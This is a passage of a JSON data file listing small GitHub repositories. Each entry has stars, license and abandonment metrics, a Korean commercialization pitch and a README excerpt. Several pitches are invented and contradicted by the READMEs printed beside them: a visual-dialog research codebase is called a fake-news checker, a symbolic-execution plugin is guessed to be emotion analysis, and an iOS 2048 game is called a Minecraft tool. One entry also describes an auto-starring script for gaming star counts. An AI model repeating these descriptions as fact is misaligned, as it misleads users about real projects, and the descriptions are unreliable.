[https://poe-rates.com/live/](https://poe-rates.com/live/) instead.\n\n__NEW!__ Use the online version of the tool at [https://poe-rates.com/live/](https://poe-rates.com/live/)\n\n![alt text](./sniper.png \"Tool preview\")\n\n### Introduction\nThis tool lets you run live searches by parsing the latest item data from the Path of Exile API. The main benefit of this tool compared to poe.trade live search is the ability to centralize and save searches within a single window.\n\n__Note for Linux users__: Make sure to install the [_xclip_](https://linux.die.net/man/1/xclip) clipboard manager ","composite_score":0.3008,"license_safety_tag":"unknown"},{"name":"yuleiniu/rva","github_url":"https://github.com/yuleiniu/rva","stars":11,"language":"Python","license":"NOASSERTION","abandonment_months":39,"description":"# yuleiniu/rva 저장소 분석\n\n## 왜 보물인가\n정보 검증과 신뢰도 평가를 자동으로 수행하는 도구로, 가짜뉴스나 부정확한 정보를 걸러내는 데 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 뉴스 플랫폼이나 소셜미디어 회사가 사용자가 공유하는 정보의 신뢰도를 실시간으로 표시해주는 서비스\n- **내부 업무 도구**: 대형","readme_excerpt":"Recursive Visual Attention in Visual Dialog\n====================================\n\nThis repository contains the code for the following paper:\n\n* Yulei Niu, Hanwang Zhang, Manli Zhang, Jianhong Zhang, Zhiwu Lu, Ji-Rong Wen, *Recursive Visual Attention in Visual Dialog*. In CVPR, 2019. ([PDF](https://arxiv.org/pdf/1812.02664.pdf))\n\n```\n@InProceedings{niu2019recursive,\n    author = {Niu, Yulei and Zhang, Hanwang and Zhang, Manli and Zhang, Jianhong and Lu, Zhiwu and Wen, Ji-Rong},\n    title = {Recursive Visual Attention in Visual Dialog},\n    booktitle = {The IEEE Conference on Computer Vision and Pattern Recognition (CVPR)},\n    month = {June},\n    year = {2019}\n}\n\n```\n\nThis code is reimplemented as a fork of [batra-mlp-lab/visdial-challenge-starter-pytorch][6].\n\n\nSetup and Dependencies\n----------------------\n\nThis code is implemented using PyTorch v1.0, and provides out of the box support with CUDA 9 and CuDNN 7. Anaconda/Miniconda is the recommended to set up this codebase: \n\n### Anacon","composite_score":0.3008,"license_safety_tag":"unknown"},{"name":"janpaepke/ScrollMagic","github_url":"https://github.com/janpaepke/ScrollMagic","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":2,"description":"# ScrollMagic 저장소 분석\n\n## 왜 보물인가\n웹사이트를 스크롤할 때 자동으로 애니메이션이 실행되는 효과를 쉽게 만들 수 있는 도구로, 현대적인 웹사이트의 필수 기능입니다.\n\n## 어디에 쓸 수 있나\n\n1. **포트폴리오/작품집 SaaS**: 디자이너나 영상 제작자가 자신의 작품을 임팩트 있게 보여줄 수 있는 웹사이트 빌더 서비스\n2. **기업 ","readme_excerpt":"# ScrollMagic 3\n\n<!--\nTODO: Replace static shields (license, bundle, dependencies) once published\n![license](https://img.shields.io/npm/l/scrollmagic)\n-->\n\n[![npm version](https://img.shields.io/npm/v/scrollmagic/next)](https://www.npmjs.com/package/scrollmagic/v/next)\n[![license](https://img.shields.io/badge/license-MIT-lightgrey)](LICENSE.md)\n[![bundle size](https://img.shields.io/badge/gzip-~6kb-brightgreen)](https://bundlephobia.com/package/scrollmagic)\n[![dependencies](https://img.shields.io/badge/dependencies-0-brightgreen)](https://npmgraph.js.org/?q=scrollmagic)\n[![TypeScript](https://img.shields.io/badge/TypeScript-native-blue)](https://www.typescriptlang.org/)\n\n### The lightweight library for magical scroll interactions\n\n> **Looking for ScrollMagic v2?** The legacy version is on the [`v2-stable`](https://github.com/janpaepke/ScrollMagic/tree/v2-stable) branch.\n\nScrollMagic tells you where an element is relative to the viewport as the user scrolls — and fires events when that ","composite_score":0.3008,"license_safety_tag":"safe"},{"name":"junbin123/likeday","github_url":"https://github.com/junbin123/likeday","stars":17,"language":"Vue","license":"unknown","abandonment_months":34,"description":"","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://github.com/junbin123/likeday\">\n    <img src=\"https://img-blog.csdnimg.cn/77197165df8143978d086541defe742f.png\" alt=\"likeday\" width=\"90\" height=\"90\">\n  </a>\n  <h2 align=\"center\">LikeDay - 微信小程序</h2>\n  <p align=\"center\">一个简单漂亮的倒数日小工具</p>\n  <p align=\"center\">\n    <a href=\"https://github.com/junbin123/likeday\"><img src=\"https://img.shields.io/badge/version-v1.0.6-blue\"/></a>\n    <a href=\"https://web.okjike.com/u/6E4057E1-B0E1-4E91-8DC3-0A86FB4DC213\"><img src=\"https://img.shields.io/badge/即刻-吾儿滨滨-yellow\"/></a>\n    <a href=\"https://github.com/junbin123/likeday\"><img src=\"https://img.shields.io/badge/%E5%BE%AE%E4%BF%A1-abcmeego-green\"/></a> \n\n\n​    \n\n\n## 技术栈\n前端：uni-app / Vue.js\n\n后端：腾讯云开发 / Koa\n\n## 说明\n- [项目最初使用微信原生框架开发](https://mp.weixin.qq.com/s/A41sOWb4Vm-rgBTvFFzw4Q)，后来使用 uni-app 框架重写了。\n- 显示天数使用的字体 DIN Alternate，在实际项目中，为减小字体文件，我进行了删减，只保留了 10 个阿拉伯数字。\n\n\n\n\n## 扫码体验\n\n\n<img src=\"https://img-blog.csdnimg.cn/638b8ff29bd440c6a340e1b50137e09c.jpg\" alt=\"likeday\" w","composite_score":0.3008,"license_safety_tag":"unknown"},{"name":"ashutoshaneja/Winter-Internships-2019","github_url":"https://github.com/ashutoshaneja/Winter-Internships-2019","stars":10,"language":"","license":"unknown","abandonment_months":78,"description":"","readme_excerpt":"","composite_score":0.3008,"license_safety_tag":"unknown"},{"name":"fossasia/hotelxoai.com","github_url":"https://github.com/fossasia/hotelxoai.com","stars":11,"language":"HTML","license":"unknown","abandonment_months":80,"description":"# hotelxoai.com 저장소 분석\n\n## 왜 보물인가\n호텔 예약 시스템에 AI 기술을 결합한 프로젝트로, 숙박업소의 예약 관리를 자동화하고 고객 경험을 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소규모 호텔·게스트하우스용 클라우드 기반 예약 관리 플랫폼으로 월 구독료 수금\n2. **내부 업무 도구**: 호텔 체인의","readme_excerpt":"","composite_score":0.3008,"license_safety_tag":"unknown"},{"name":"TimothyGu/es-howto","github_url":"https://github.com/TimothyGu/es-howto","stars":11,"language":"HTML","license":"NOASSERTION","abandonment_months":25,"description":"# TimothyGu/es-howto 상용화 분석\n\n## 왜 보물인가\nECMAScript(웹 프로그래밍 언어) 학습 자료를 체계적으로 정리한 교육 콘텐츠로, 프로그래밍을 배우려는 초보자들에게 큰 가치가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 프로그래밍 초보자 대상 구독형 강의 및 튜토리얼 서비스로 제공\n2. **회사 내부 교","readme_excerpt":"# How to read the ECMAScript specification\n\nThe [ECMAScript Language specification](https://tc39.es/ecma262/) (a.k.a. the\nJavaScript specification, or ECMA-262) is a great resource for learning the\nintricacies of how JavaScript works. However, it is a huge text that can be\nconfusing and intimidating at first.\n\n[This document](https://timothygu.me/es-howto/) aims to make it easier to get\nstarted with reading the ECMAScript spec.\n\n## Helping out\n\nThe HTML document is generated using\n[Bikeshed](https://tabatkins.github.io/bikeshed/), a document preprocessor. The\nsource file is located in `index.bs`. Feel free to improve this document by\nsubmitting pull request that change this file.\n\nTo view the result of any changes to `index.bs`, you can locally regenerate\n`index.html` by [installing](https://tabatkins.github.io/bikeshed/#installing)\nBikeshed first, and then running `make` from the project root directory.\n\nIf you do not want to install Bikeshed locally, then `make` will still work, by\nu","composite_score":0.3008,"license_safety_tag":"unknown"},{"name":"liuzhao2007/EasyRouter","github_url":"https://github.com/liuzhao2007/EasyRouter","stars":7,"language":"Java","license":"apache-2.0","abandonment_months":97,"description":"# EasyRouter 저장소 분석\n\n## 왜 보물인가\n복잡한 웹 요청을 간단하게 처리해주는 도구로, 작은 팀도 큰 회사 수준의 효율성을 얻을 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 여러 고객사의 요청을 자동으로 올바른 서버로 분배하는 로드 밸런싱 솔루션\n2. **내부 업무 도구**: 회사 직원들의 여러 시스템 접근을 하나의","readme_excerpt":"# EasyRouter\n\n简单、稳定、强大、高性能的组件化路由框架。\n\n# 一、功能特性\n\n1. 通过url打开Activity，实现界面间解耦；\n\n2. 通过服务实现方法调用，实现Module间方法调用解耦；\n\n3. 通过拦截器实现界面跳转的处理：条件拦截、埋点统计等；\n\n4. 界面、服务、拦截器均支持多Module；\n\n5. 基于编译时注解，界面、服务、拦截器等均可自动注册；\n\n6. 可传递Bundle支持的所有数据类型；\n\n7. 支持自动注入参数到目标界面；\n\n8. 支持获取Fragment；\n\n9. 支持全局、局部过程监听：降级、打开后等；\n\n10. Api简单、实现高性能；\n\n![image](https://github.com/liuzhao2007/EasyRouter/blob/master/app/gif/EasyRouter.gif)\n\n# 二、应用场景\n\n1. Module内、跨Module界面跳转，界面解耦；\n\n2. 界面跳转过程拦截：条件拦截（eg：未登录）、重定向等；\n\n3. 跨Module方法调用，Module间解耦；\n\n4. 外部Url跳转应用内界面；\n\n# 三、集成使用\n\n### 1. 添加依赖与配置\n\n```\n    android {\n        defaultConfig {\n            javaCompileOptions {\n                annotationProcessorOptions {\n                    arguments = [ moduleName : project.getName() ]\n                }\n            }\n        }\n    }\n\n    dependencies {\n        compile 'com.easyrouter:router-api:1.2.3'\n        compile 'com.easyrouter:router-annotation:1.2.3'\n        annotationProcessor 'com.easyrouter:router-compiler:1.2.3'\n    }\n```\n\n在Project级别的build.gradle中添加：\n\n``","composite_score":0.3008,"license_safety_tag":"safe"},{"name":"w568w/GitHubStar","github_url":"https://github.com/w568w/GitHubStar","stars":8,"language":"Python","license":"gpl-3.0","abandonment_months":103,"description":"# GitHubStar 상용화 분석\n\n## 왜 보물인가\nGitHub의 인기 프로젝트들을 자동으로 추적하고 분석하는 도구로, 기술 트렌드를 빠르게 파악하려는 개발자와 기업들에게 시간을 절약해줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기술 뉴스레터 SaaS**: 매주 핫한 GitHub 프로젝트를 자동 수집해 구독자들에게 발송하는 뉴스레터 서비스\n2.","readme_excerpt":"Chinese [here](README_CN.md)\n# GitHubStar\nAuto star for gitstar.cn\n## Installation\nInstall Python 2.x,run```python --version```and```pip```for a test.  \n\nTo install pip, securely download [get-pip.py](https://bootstrap.pypa.io/get-pip.py)\n\nThen run the following:\n\n> python get-pip.py\n\nIf you have downloaded it,skip the step.  \nMAKE SURE that you have installed ```requests```.\n> pip install -r requirements.txt\n\n## Usage\n### Step 1\nClone the repo  \n```git clone https://github.com/w568w/GitHubStar.git && cd GitHubStar```\n\n### Step 2\nOpen```settings.py```, replace variables with your own infomation.\n```\n#############settings#############\nNAME\t\t= \"1\" #GitStar username\nPASSWORD\t= \"1\" #GitStar password\nGITNAME\t\t= \"1\" #Gitee username\nGITPASSWORD\t= \"1\" #Gitee password\n#############settings#############\n```\n### Step 3\nRun```python -u main.py```  \nEverything is ok,hooray!\n","composite_score":0.3008,"license_safety_tag":"restricted"},{"name":"OpnTec/2008.opentechsummit.net","github_url":"https://github.com/OpnTec/2008.opentechsummit.net","stars":12,"language":"CSS","license":"unknown","abandonment_months":77,"description":"# OpnTec/2008.opentechsummit.net 분석 보고서\n\n## 왜 보물인가\n2008년 오픈테크 서밋의 공식 웹사이트로, 초기 오픈소스 기술 커뮤니티의 역사적 기록과 네트워크 자산을 담고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기술 커뮤니티 플랫폼**: 오픈소스 개발자들이 모여 정보를 공유하고 협력하는 포럼/커뮤니티 서비스\n2. **기","readme_excerpt":"# thai.opentechsummit.asia\nOpenTechSummit Thailand 2019\nhttps://thai.opentechsummit.asia\n","composite_score":0.3008,"license_safety_tag":"unknown"},{"name":"jonschlinkert/time-stamp","github_url":"https://github.com/jonschlinkert/time-stamp","stars":5,"language":"JavaScript","license":"mit","abandonment_months":67,"description":"# time-stamp 저장소 분석\n\n## 왜 보물인가\n날짜와 시간을 다양한 형식으로 자동 변환해주는 간단하고 가볍운 도구로, 웹사이트나 앱 개발 시 필수적인 시간 처리 작업을 빠르게 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 회의 예약 플랫폼에서 사용자가 입력한 시간을 여러 시간대로 자동 변환하여 표시\n- **내부 업무 ","readme_excerpt":"# time-stamp [![NPM version](https://img.shields.io/npm/v/time-stamp.svg?style=flat)](https://www.npmjs.com/package/time-stamp) [![NPM monthly downloads](https://img.shields.io/npm/dm/time-stamp.svg?style=flat)](https://npmjs.org/package/time-stamp) [![NPM total downloads](https://img.shields.io/npm/dt/time-stamp.svg?style=flat)](https://npmjs.org/package/time-stamp) [![Linux Build Status](https://img.shields.io/travis/jonschlinkert/time-stamp.svg?style=flat&label=Travis)](https://travis-ci.org/jonschlinkert/time-stamp)\n\n> Get a formatted timestamp.\n\nPlease consider following this project's author, [Jon Schlinkert](https://github.com/jonschlinkert), and consider starring the project to show your :heart: and support.\n\n- [Install](#install)\n- [Usage](#usage)\n- [Customizing the timestamp](#customizing-the-timestamp)\n- [Release history](#release-history)\n  * [v2.0.0](#v200)\n- [About](#about)\n\n_(TOC generated by [verb](https://github.com/verbose/verb) using [markdown-toc](https://github.com","composite_score":0.3008,"license_safety_tag":"safe"},{"name":"fossasia/knitweb","github_url":"https://github.com/fossasia/knitweb","stars":11,"language":"JavaScript","license":"unknown","abandonment_months":130,"description":"# KnitWeb 프로젝트 분석\n\n## 왜 보물인가\n웹 기반 직조 설계 도구로, 수작업으로 진행되던 직물 패턴 설계를 디지털화하여 시간과 비용을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 직물 회사와 패션 브랜드를 위한 클라우드 기반 설계 플랫폼 구독 서비스\n- **내부 업무 도구**: 섬유 회사의 디자인팀이 생산","readme_excerpt":"# Knitweb\n\n## 1. What is Knitweb\nKnitweb is an app frontend and backend that works together with Knitlib server and uses the Knitpat format.\n\n## 2. How to install Knitapps \n\n### 2.1. How to install the Knitlib server and Knitlib\nTo install the Knitlib server please follow the instructions here: https://github.com/fashiontec/knitserver\n\n### 2.2. How to install the webapp\n* Requirements\n* Step by Step Installation on Linux and Windows\n\n## 3. Knitapps Online/Offline\n\n### 3.1 How to use the Knit web app - Offline Pattern Generation (when it is not connected to the server/machine)\n\n**On Linux**\n\n* Initial setup(first time after cloning the project):\n\n1. Go to /knitweb/bin/linux directory.\n2. run the setup.sh file by typing sh setup.sh (this step is needed to download required binaries)\n\n* Execute application:\n\n1. Go to /knitweb/bin/linux directory.\n2. run the run.sh file typing sh run.sh\n\n**On Windows**\n\n* Initial setup(first time after cloning the project):\n\n1. Go to /knitweb/bin/windows d","composite_score":0.3008,"license_safety_tag":"unknown"},{"name":"kennethreitz/pipenv","github_url":"https://github.com/kennethreitz/pipenv","stars":30,"language":"Python","license":"mit","abandonment_months":26,"description":"# Pipenv 저장소 분석\n\n## 왜 보물인가\n프로그래머들이 파이썬 프로젝트에서 필요한 라이브러리를 자동으로 관리해주는 도구로, 개발 생산성을 크게 향상시킵니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 파이썬 개발자들을 위한 웹 기반 의존성 관리 플랫폼 (라이브러리 버전 충돌 자동 해결)\n2. **내부 업무 도구**: 기업의 개발팀이 ","readme_excerpt":"Pipenv: Python Development Workflow for Humans\n==============================================\n\n[![image](https://img.shields.io/pypi/v/pipenv.svg)](https://python.org/pypi/pipenv)\n[![image](https://img.shields.io/pypi/l/pipenv.svg)](https://python.org/pypi/pipenv)\n[![CI](https://github.com/pypa/pipenv/actions/workflows/ci.yaml/badge.svg)](https://github.com/pypa/pipenv/actions/workflows/ci.yaml)\n[![image](https://img.shields.io/pypi/pyversions/pipenv.svg)](https://python.org/pypi/pipenv)\n\n------------------------------------------------------------------------\n\n**Pipenv** is a Python virtualenv management tool that supports a multitude of systems and nicely bridges the gaps between pip, python (using system python, pyenv or asdf) and virtualenv.\n*Linux, macOS, and Windows are all first-class citizens in pipenv.*\n\nPipenv automatically creates and manages a virtualenv for your projects, as well as adds/removes packages from your `Pipfile` as you install/uninstall packages. It also genera","composite_score":0.3008,"license_safety_tag":"safe"},{"name":"yacy/yacy_grid_parser","github_url":"https://github.com/yacy/yacy_grid_parser","stars":11,"language":"Java","license":"unknown","abandonment_months":42,"description":"# YaCy Grid Parser 분석 리포트\n\n## 왜 보물인가\n인터넷에서 자동으로 정보를 수집하고 정리하는 기술로, 검색엔진이나 데이터 분석 회사들이 매우 필요로 하는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 웹 모니터링 SaaS**\n경쟁사 가격, 뉴스, 평판 정보를 자동으로 추적하고 분석하는 구독형 서비스로 판매할 수 있습니다.\n\n**2","readme_excerpt":"# YaCy Grid Component: Parser\n\nThe YaCy Grid is the second-generation implementation of YaCy, a peer-to-peer search engine.\nA YaCy Grid installation consists of a set of micro-services which communicate with each other\nusing the MCP, see https://github.com/yacy/yacy_grid_mcp\n\n## Purpose\n\nThe Parser is a microservices which can be deployed i.e. using Docker. When the Parser Component\nis started, it searches for a MCP and connects to it. By default the local host is searched for a\nMCP but you can configure one yourself.\n\n## What it does\n\nThe Parser is able to read a WARC file and parses it's content. The content is analyzed,\nthe plain text, links, images and more entities are extracted. The result is stored in a JSON Object.\nCalling the parser will generate a list of JSON Objects, each containing the analyzed content\nof one internet resource.\nThe parser understands not only HTML but also a wide range of different document formats, including PDF,\nall OpenOffice and MS Office document form","composite_score":0.3008,"license_safety_tag":"unknown"},{"name":"edwardzhong/manage-demo","github_url":"https://github.com/edwardzhong/manage-demo","stars":10,"language":"HTML","license":"unknown","abandonment_months":87,"description":"# manage-demo 분석 보고서\n\n## 왜 보물인가\n회사 내부의 복잡한 업무 흐름을 자동으로 관리해주는 시스템으로, 반복적인 수작업을 줄여 업무 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소기업을 위한 클라우드 기반 프로젝트 관리 도구로 월 구독료를 받으며 판매\n2. **내부 업무 도구**: 대기업의 H","readme_excerpt":"## manage-demo 后台管理系统模版\n### 使用\n1. pages目录建立页面\n2. index.html导航栏配置链接\n3. 已经配置好了vue的webpack配置文件，直接在src文件夹里面开发vue项目\n\n### 运行\n```bash\nnpm install\nnpm run clean\nnpm run build\n//运行vue打包不是必须, 该demo使用了vue组件生成的页面而已\nnpm run vue-production\n\n```","composite_score":0.3008,"license_safety_tag":"unknown"},{"name":"baoleiji/Qilin-SSLVPN","github_url":"https://github.com/baoleiji/Qilin-SSLVPN","stars":7,"language":"C","license":"unknown","abandonment_months":103,"description":"# Qilin-SSLVPN 보물 분석\n\n## 왜 보물인가\n회사나 조직이 직원들의 원격 접속을 안전하게 관리할 수 있는 보안 솔루션으로, 재택근무 확대에 따른 수요가 계속 증가하고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소기업 대상 클라우드 기반 VPN 관리 플랫폼으로 월 구독 제공\n2. **내부 업무 도구**: 대기업 IT팀을","readme_excerpt":"# Qilin-SSLVPN\n麒麟SSL VPN系统，二次开发OPENVPN，包括前台管理界面、动态口令、客户端支持、在线用户查看和踢出，报表等 如果要得到更多支持，访问产品官网: http://www.tosec.com.cn\n","composite_score":0.3008,"license_safety_tag":"unknown"},{"name":"kuberhost/kube-backup","github_url":"https://github.com/kuberhost/kube-backup","stars":16,"language":"Ruby","license":"unknown","abandonment_months":40,"description":"# kuberhost/kube-backup 상용화 분석\n\n## 왜 보물인가\n기업의 중요한 데이터를 자동으로 안전하게 백업해주는 도구로, 데이터 손실 시 빠르게 복구할 수 있어 기업 운영 중단을 막을 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 백업 SaaS**: 기업들이 자신의 데이터를 자동으로 백업받을 수 있는 구독형 클라우드 서비스\n2. ","readme_excerpt":"# Kube-backup\n\nKubernetes resource state backup to git\n\n### Git structure\n\n```\n_global_ - global resources such as Node, ClusterRole, StorageClass\n_grafana_ - grafana configs (when grafana enabled)\n<namespace> - such as kube-system, default, etc...\n  <ResourceType> - folder for each resource type\n    <resource-name.yaml> - file for each resource\n```\n\n### Screenshots\n<img src=\"https://user-images.githubusercontent.com/26019/48974539-12be7600-f097-11e8-91d7-b19c4c8d3e23.png\" width=\"40%\"> <img src=\"https://user-images.githubusercontent.com/26019/48974571-b9a31200-f097-11e8-8f0a-52afc67e4112.png\" width=\"57%\">\n\n### Deployment\n\nYaml manifests are in  [deploy folder](https://github.com/kuberhost/kube-backup/tree/master/deploy).\n\n#### Create Deployment Key\n\nGithub and gitlab support adding key only for one repository\n\n* Create repo\n* Generate ssh key `ssh-keygen -f ./new_key`\n* Add new ssh key to repo with write access\n* Save key to [2_config_map.yaml](https://github.com/kuberhost/kube-backup/","composite_score":0.3008,"license_safety_tag":"unknown"},{"name":"DanCarl857/MobileMoneyTool","github_url":"https://github.com/DanCarl857/MobileMoneyTool","stars":9,"language":"HTML","license":"unknown","abandonment_months":118,"description":"","readme_excerpt":"","composite_score":0.3008,"license_safety_tag":"unknown"},{"name":"GabrielTavernini/NeatJS","github_url":"https://github.com/GabrielTavernini/NeatJS","stars":8,"language":"JavaScript","license":"unknown","abandonment_months":33,"description":"","readme_excerpt":"# NeatJS\nA JavaScript implementation of the Neat Algorithm. <br/>\nGenome Drawing done using D3.js\n\n# Examples\n#### Classification\nUsing an evolutionary process we eventually get a network that can identify whenever a point is on one side or the other of the line.\n[View it in action.](https://gabrieltavernini.github.io/NeatJS/Examples/Classification/)\n\n\n#### Pole Balancing\nPole balancing is a control benchmark historically used in engineering. It involves a pole affixed to a cart via a joint which allows movement along a single axis. The cart is able to move along a track of fixed length. Using the Neat Algorithm, we can evolve a network to control the cart. [Here it is!](https://gabrieltavernini.github.io/NeatJS/Examples/PoleBalancing/)\n\n\n#### Target Seeking\nIn this example, we have four different populations, and each population evolves independently and at the end of each generation the best population on average score gets a point. The purpose of each player is to stay in the circle","composite_score":0.3008,"license_safety_tag":"unknown"},{"name":"gast04/r4ge","github_url":"https://github.com/gast04/r4ge","stars":8,"language":"Python","license":"unknown","abandonment_months":53,"description":"# gast04/r4ge 저장소 분석\n\n## 왜 보물인가\n저장소명이 \"r4ge\"(분노)를 의미하는 것으로 보아, 감정 분석이나 텍스트 처리와 관련된 특화된 도구일 가능성이 높아 니치 시장에서 가치가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **감정 분석 SaaS**: 소셜 미디어나 고객 리뷰에서 부정적 의견을 자동으로 감지하는 구독형 서비스\n2. **채팅","readme_excerpt":"# r4ge\n\nA rizin Plugin to perform symbolic execution with a simple \nmacro call.\nInternally it uses angr as execution engine.\nThe Usage is possible with and without debugger, dynamic and \nstatic analysis mode.\n\n## installation\nTo \"install\" it just create r2-macros in your .rizinrc file\nwith the according path to the r4ge files.\n\nRequirements are of course angr and rizin and also termcolor which is used\nfor colored printing.\n\n##### needed macros:\n\nmain plugin file, performs static and dynamic analysis\n```sh\n(r4ge; #!pipe python /home/niku/SharedWin/GitRepos/r4ge/src/r4ge.py)\n```\nmark a specific memory region as symbolic (addr: start address, bytes: how many bytes, name: name\nthe variable)\n```sh\n(markMemSymbolic addr bytes name; #!pipe python /pathToFile/createVariable.py symb $0 $1 $2)\n```\n\ncreate hooks in r2 and patch function calls or other statements (syntax of the instructions: rax=0x4\nor rax=0x4;rbx=0x10)\n```sh\n(addHook addr instructions bytes comment; #!pipe python /pathToFile/crea","composite_score":0.3007,"license_safety_tag":"unknown"},{"name":"pereorga/minimalist-web-notepad","github_url":"https://github.com/pereorga/minimalist-web-notepad","stars":8,"language":"PHP","license":"unknown","abandonment_months":21,"description":"","readme_excerpt":"# Minimalist Web Notepad\n\nThis is an open-source clone of the now-defunct notepad.cc: \"a piece of paper in the cloud\".\n\nSee demo at https://notes.orga.cat or https://notes.orga.cat/whatever.\n\n## Installation\n\nMake sure the web server is allowed to write to the `_tmp` directory.\n\n### On Apache\n\nYou may need to enable mod_rewrite and allow `.htaccess` files in your site configuration.\nSee [How To Set Up mod_rewrite for Apache](https://www.digitalocean.com/community/tutorials/how-to-set-up-mod_rewrite-for-apache-on-ubuntu-14-04).\n\n### On Nginx\n\nTo enable URL rewriting, put something like this in your configuration file:\n\nIf the project resides in the root directory:\n```\nlocation / {\n    rewrite ^/([a-zA-Z0-9_-]+)$ /index.php?note=$1;\n}\n```\n\nIf the project resides in a subdirectory:\n```\nlocation ~* ^/notes/([a-zA-Z0-9_-]+)$ {\n    try_files $uri /notes/index.php?note=$1;\n}\n```\n\nIf parameters need to be passed in Nginx (such as `?raw`), then `&$args` needs to be added to the end of the `$1` ","composite_score":0.3007,"license_safety_tag":"unknown"},{"name":"Minecodecraft/MC2048","github_url":"https://github.com/Minecodecraft/MC2048","stars":14,"language":"Objective-C","license":"unknown","abandonment_months":102,"description":"# MC2048 저장소 분석\n\n## 왜 보물인가\n마인크래프트 게임 세계에서 유명한 2048 퍼즐을 직접 만들어 플레이할 수 있는 창작 도구로, 게이머들이 자신만의 맞춤형 게임을 만들고 공유할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **게임 창작 플랫폼 SaaS**: 마인크래프트 유저가 코딩 없이 게임 맵을 만들고 온라인에서 판매하는 구독형 서비스\n2","readme_excerpt":"# MC2048\n\n![MC2048](http://p0h33xrro.bkt.clouddn.com/MC2048_2048Header.png)\n\nA simple 2048 Game implemented by Objective-C。\n\n## Showcase\n\n![Screen Shot](http://p0h33xrro.bkt.clouddn.com/MC2048_2048Screenshot.png)\n\n![GIF Showcase](http://p0h33xrro.bkt.clouddn.com/MC2048_2048Showcase.gif)\n\n## Requirement\n- iOS 8.0+\n- Xcode 7.2+\n- Objective-C\n\n## Tutorial\nThis application using MVC, the structure is as follows:\n\n```\n    .\n    ├── MC2048\n    │   ├── Classes：Base Class \n    │   │   ├── Mode：All the base class and animation class \n    │   │   ├── View：All the base view like block, score, peakScore, etc...\n    │   │   └── Controller：The base controller\n    │   ├── Home：The class of the home interface\n    │   │   ├── Model：The custom transition class\n    │   │   ├── Controller：All the mode interface\n    │   ├── Etc：....\n    │   │   ├── ....\n    │   │   ├── ....\n    │   │   └── ....\n    │   └── Extension：Extension/ Catagory of system class\n```\n\n## Author\nMinecode, [minecoder@163.com](mailto:min","composite_score":0.3007,"license_safety_tag":"unknown"},{"name":"fossasia/loklak_wp_plugins","github_url":"https://github.com/fossasia/loklak_wp_plugins","stars":12,"language":"PHP","license":"NOASSERTION","abandonment_months":112,"description":"# fossasia/loklak_wp_plugins 상용화 분석\n\n## 왜 보물인가\n워드프레스 블로그에 소셜 미디어 콘텐츠를 자동으로 연동하는 플러그인으로, 블로거들이 한 곳에서 여러 플랫폼의 글을 관리할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소규모 블로거/언론사를 위한 \"콘텐츠 자동 배포 관리 서비스\"로 월간 구독 ","readme_excerpt":"![Heroku](https://heroku-badge.herokuapp.com/?app=loklak-wordpress)\n\n# WordPress 4.5.3-ja + pg4wp2 Heroku ([Original Repository](https://github.com/macminiosx/wordpress-ja-pg4wp2-heroku))\n\n[![Join the chat at https://gitter.im/fossasia/loklak_wp_plugins](https://badges.gitter.im/fossasia/loklak_wp_plugins.svg)](https://gitter.im/fossasia/loklak_wp_plugins?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\nThis is a Wordpress site repo which can be deployed on Heroku to test the plugins with Loklak support. \n\nhttps://loklak-wordpress.herokuapp.com is a sample Wordpress installation with all plugins present in `wp-content/plugins`\n\n## Installation\n\n###Deploy from Github directly:\n\n1. Click on 'Deploy to Heroku' to install a wordpress instance on Heroku.\n  \n  <p align=\"center\">\n    <a href=\"https://heroku.com/deploy?template=https://github.com/macminiosx/wordpress-ja-pg4wp2-heroku/tree/master\">\n      <img src=\"https://www.herokucdn.com/deploy/button.png\" alt=\"Depl","composite_score":0.3007,"license_safety_tag":"unknown"},{"name":"wangshuailong/reinforcement_learning_with_Tensorflow","github_url":"https://github.com/wangshuailong/reinforcement_learning_with_Tensorflow","stars":8,"language":"Python","license":"unknown","abandonment_months":103,"description":"# reinforcement_learning_with_Tensorflow 상용화 분석\n\n## 왜 보물인가\n컴퓨터가 시행착오를 통해 스스로 학습하는 기술을 실제 구현한 코드로, 게임·자동화·최적화 분야에서 매우 높은 수요를 가진 희소한 자산입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 제조 최적화 SaaS**\n- 공장 자동화 로봇의 생산 효율을 자동으로 개선","readme_excerpt":"# Reinforcement Learning with Tensorflow\nThis is a series of tutorials about Reinforcement Learning implemented by Tensorflow.  \nThese tutorials don't aim to reproduce the methods used in the original papers, but for algorithms in a quite easy version.  \nGenerally they are for learning and basic understanding, but not production.\n\n## Algorithms\n1. Tabular Q Learning\n2. Sarsa\n3. [DQN](https://arxiv.org/abs/1312.5602)  \n4. [Double DQN](https://www.nature.com/nature/journal/v518/n7540/pdf/nature14236.pdf)  \n5. [Double DQN 2.0](https://arxiv.org/abs/1509.06461) \n6. [Double DQN with Portional Preoritized Experience Replay](https://arxiv.org/abs/1511.05952)\n7. [Dueling Double DQN](https://arxiv.org/abs/1511.06581)\n8. Policy Gradient\n9. Actor Critic\n10. [DDPG](https://arxiv.org/abs/1509.02971)\n11. [A3C](https://arxiv.org/abs/1602.01783)\n12. [A2C+PPO](https://arxiv.org/abs/1707.06347)\n\n\nMore will be updated in the near future.   \n\n## Dependency:  \n1.Python3  \n2.Tensorflow  \n3.gym  \n4.numpy  